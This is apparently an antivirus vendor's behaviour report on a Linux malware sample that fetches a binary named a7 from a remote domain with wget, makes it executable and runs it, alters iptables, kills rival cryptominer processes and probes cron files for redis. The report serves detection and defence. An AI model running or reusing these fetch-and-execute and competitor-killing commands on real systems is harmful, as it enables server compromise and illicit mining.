Technical Information
Malicious functions:
Launches itself as a daemon
Compiles a program from source codes:
- gcc
Modifies firewall settings:
- iptables
Launches processes:
- sh -c exec bash --login
- bash --login
- id -u
- ls /etc/bash_completion.d
- mesg n
- top
- make
- wget ss.sydwzl.cn/a7
- chmod 777 a7
- ./a7
- touch /tmp/.a7
- grep -i -q redis /var/spool/cron/atjobs
- grep -i -q redis /var/spool/cron/atspool
- grep -i -q redis /var/spool/cron/crontabs
- grep -i -q redis /var/spool/cron/crontabs/*
- grep -i -q redis /etc/crontab
- grep -i -q redis /etc/cron.d/*
- rm -rf /etc/x7
- chmod -x /etc/xig
- chmod -x /root/cranberry /tmp/cranberry /root/yam
- chmod -x /etc/root.sh
- chmod -x /usr/bin/gpg-agentd
- chmod -x /usr/bin/kworker
- chmod -x /usr/local/bin/gpg-agentd
- pkill -f stratum
Attempts to kill the following processes:
- killall -9 xig
- killall -9 cranberry
- killall -9 root.sh
- killall -9 gpg-agentd
- killall -9 .gpg-agent
- killall -9 xmr-stak
- killall -9 kworker
- killall -9 .gpg
- killall -9 pnscan
- killall -9 netfs
- killall -9 geth
Performs operations with the file system:
Modifies file access rights:
- /dev/pts/0
- /var/tmp/a7
Creates or modifies files:
- /dev/pts/0
- /dev/ptmx
- /var/tmp/a7
- /tmp/.a7
Deletes files:
- /etc/x7
Network activity:
Establishes connection:
- 11#.##.150.172:1024
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- ss.##dwzl.cn/a7
DNS ASK:
- ss.##dwzl.cn
Sends data to the following servers:
- 11#.##.150.172:1024
Receives data from the following servers:
- 11#.##.150.172:1024
Other:
Collects OS information
Collects CPU information
Collects RAM information
Collects information about network activity
